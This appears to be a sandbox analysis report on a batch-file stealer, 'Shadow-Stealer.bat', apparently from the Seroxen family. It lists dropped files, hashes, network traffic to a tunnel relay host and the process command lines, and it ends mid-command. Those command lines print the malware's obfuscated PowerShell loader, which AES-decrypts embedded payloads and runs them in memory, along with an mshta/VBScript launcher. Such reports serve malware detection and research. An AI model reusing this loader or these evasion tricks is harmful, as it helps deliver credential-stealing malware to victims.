SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\$sxr-powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):452608
                                                                                                        Entropy (8bit):5.459268466661775
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                        SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                        SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                        SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: trafik_yenilme.bat, Detection: malicious, Browse
                                                                                                        • Filename: a.bat, Detection: malicious, Browse
                                                                                                        • Filename: Rune_Launcher.bat, Detection: malicious, Browse
                                                                                                        • Filename: SCO_23.bat, Detection: malicious, Browse
                                                                                                        • Filename: IMG_690B23.docx.bat, Detection: malicious, Browse
                                                                                                        • Filename: Qtagiietkyb.png.bat, Detection: malicious, Browse
                                                                                                        • Filename: IMG_690B23.bat, Detection: malicious, Browse
                                                                                                        • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                        • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                        • Filename: 345d.cmd, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: PingOptimizerMain.bat, Detection: malicious, Browse
                                                                                                        • Filename: crack.bat, Detection: malicious, Browse
                                                                                                        • Filename: da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat, Detection: malicious, Browse
                                                                                                        • Filename: Final_rooming_list.bat, Detection: malicious, Browse
                                                                                                        • Filename: RE_432-7784.js, Detection: malicious, Browse
                                                                                                        • Filename: FA150623.pdf.bat, Detection: malicious, Browse
                                                                                                        • Filename: Uni.bat, Detection: malicious, Browse
                                                                                                        • Filename: update_SC.bat, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):289792
                                                                                                        Entropy (8bit):6.135598950357573
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                        MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                        SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                        SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14848
                                                                                                        Entropy (8bit):4.477514759495553
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Mp2bLg8CB95kCfjmRXKbpkSprJ6AdgxYsPvWw5aIR:MpMLgdrkCjm9KZJAXWw5
                                                                                                        MD5:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                        SHA1:51C97EBE601EF079B16BCD87AF827B0BE5283D96
                                                                                                        SHA-256:DBA3137811C686FD35E418D76184070E031F207002649DA95385DFD05A8BB895
                                                                                                        SHA-512:D9DF8C1F093EA0F7BDE9C356349B2BA43E3CA04B4C87C0F33AB89DDA5AFE9966313A09B60720AA22A1A25D43D7C71A060AF93FB8F6488201A0E301C83FA18045
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}xT[9.:.9.:.9.:.0a..=.:.-r9.;.:.-r>.(.:.9.;...:.-r;.:.:.-r?.:.:.-r2.:.:.-r..8.:.-r8.8.:.Rich9.:.........PE..d.....c..........."............................@....................................r'....`.................................................d'..P....P.......@...............p.. ....$..T............................ ..............(!..p............................text............................... ..`.rdata..4.... ......................@..@.data........0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc.. ....p.......8..............@..B........................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):452608
                                                                                                        Entropy (8bit):5.459268466661775
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                        MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                        SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                        SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                        SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                        File type:ASCII text, with very long lines (4949), with CRLF line terminators
                                                                                                        Entropy (8bit):6.034917295946877
                                                                                                        TrID:
                                                                                                          File name:Shadow-Stealer.bat
                                                                                                          File size:13'144'733 bytes
                                                                                                          MD5:cf5b412ffc3ce43cd7ddce602fc67f56
                                                                                                          SHA1:221dfcd0868158f676c472d8a5bcf9647f0c7d51
                                                                                                          SHA256:84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
                                                                                                          SHA512:695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
                                                                                                          SSDEEP:49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b
                                                                                                          TLSH:52D6C0DAFE622B6C030B1C9749025DD9981DC2A724F1CEDFBE106B1B205B6C1EED5297
                                                                                                          File Content Preview:%gfJDTDQFGwMPRbEGEjqFrFhhqZzZBawNSJUWBhSvEagyQWNAEcrIXXBayaLuDoDdzywIGgFVQwBPXiQSLzVWimnuIuXYUXqOXByRaFrWXUpbWjDNJrgDRfwKIBAMHfBqDkpVjzqGGzyMwLVWoKObqmwrFmIYFfOrTzXkugbKAZxSghNxdaVxPWAOoyPxoQBZjFrxmjcIgDaPpbLVXLvbIQawzIwvPfUhYViZoQIvyMOLwiXLluWcVWQRcwycmh
                                                                                                          Icon Hash:9686878b929a9886
                                                                                                          TCP packets
                                                                                                          Timestamp                           Source Port  Dest Port  Source IP       Dest IP
                                                                                                          Dec 3, 2023 16:35:27.356673956 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:35:27.542896032 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:35:27.543107033 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:35:28.370522976 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:35:28.557357073 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:35:43.558749914 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:35:43.558934927 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:35:53.642613888 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:35:53.828510046 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:08.844676971 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:08.844876051 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:18.830081940 CET  49716        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:19.016064882 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:25.571134090 CET  22112        49716      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:27.174932003 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.366257906 CET  22112        49725      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:27.366410017 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.366954088 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:27.557534933 CET  22112        49725      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:42.576751947 CET  22112        49725      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:36:42.576874971 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:52.564503908 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:36:52.756547928 CET  22112        49725      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:37:07.792742968 CET  22112        49725      167.71.56.116   192.168.2.6
                                                                                                          Dec 3, 2023 16:37:07.792809010 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:37:17.814313889 CET  49725        22112      192.168.2.6     167.71.56.116
                                                                                                          Dec 3, 2023 16:37:18.006856918 CET  22112        49725      167.71.56.116   192.168.2.6

                                                                                                          UDP packets
                                                                                                          Timestamp                           Source Port  Dest Port  Source IP       Dest IP
                                                                                                          Dec 3, 2023 16:35:26.905977964 CET  60163        53         192.168.2.6     1.1.1.1
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET  53           60163      1.1.1.1         192.168.2.6

                                                                                                          DNS queries
                                                                                                          Timestamp                           Source IP     Dest IP   Trans ID  OP Code             Name                                  Type            Class        DNS over HTTPS
                                                                                                          Dec 3, 2023 16:35:26.905977964 CET  192.168.2.6   1.1.1.1   0x11b1    Standard query (0)  throbbing-mountain-09011.pktriot.net  A (IP address)  IN (0x0001)  false

                                                                                                          DNS answers
                                                                                                          Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                                  CName                           Address        Type                    Class        DNS over HTTPS
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET  1.1.1.1    192.168.2.6  0x11b1    No error (0)  throbbing-mountain-09011.pktriot.net  eu-central-7075.packetriot.net  -              CNAME (Canonical name)  IN (0x0001)  false
                                                                                                          Dec 3, 2023 16:35:27.268147945 CET  1.1.1.1    192.168.2.6  0x11b1    No error (0)  eu-central-7075.packetriot.net        -                               167.71.56.116  A (IP address)          IN (0x0001)  false

                                                                                                          Target ID:0
                                                                                                          Start time:16:34:44
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Shadow-Stealer.bat" "
                                                                                                          Imagebase:0x7ff7bf910000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:16:34:44
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:16:34:51
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Users\user\Desktop\Shadow-Stealer.bat.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                          Imagebase:0x7ff6bffc0000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:16:35:07
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:16:35:07
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-mshta.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                                                                                          Imagebase:0x7ff64e1d0000
                                                                                                          File size:14'848 bytes
                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:11
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:16:35:12
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
                                                                                                          Imagebase:0x7ff7137e0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:14
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:15
                                                                                                          Start time:16:35:13
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
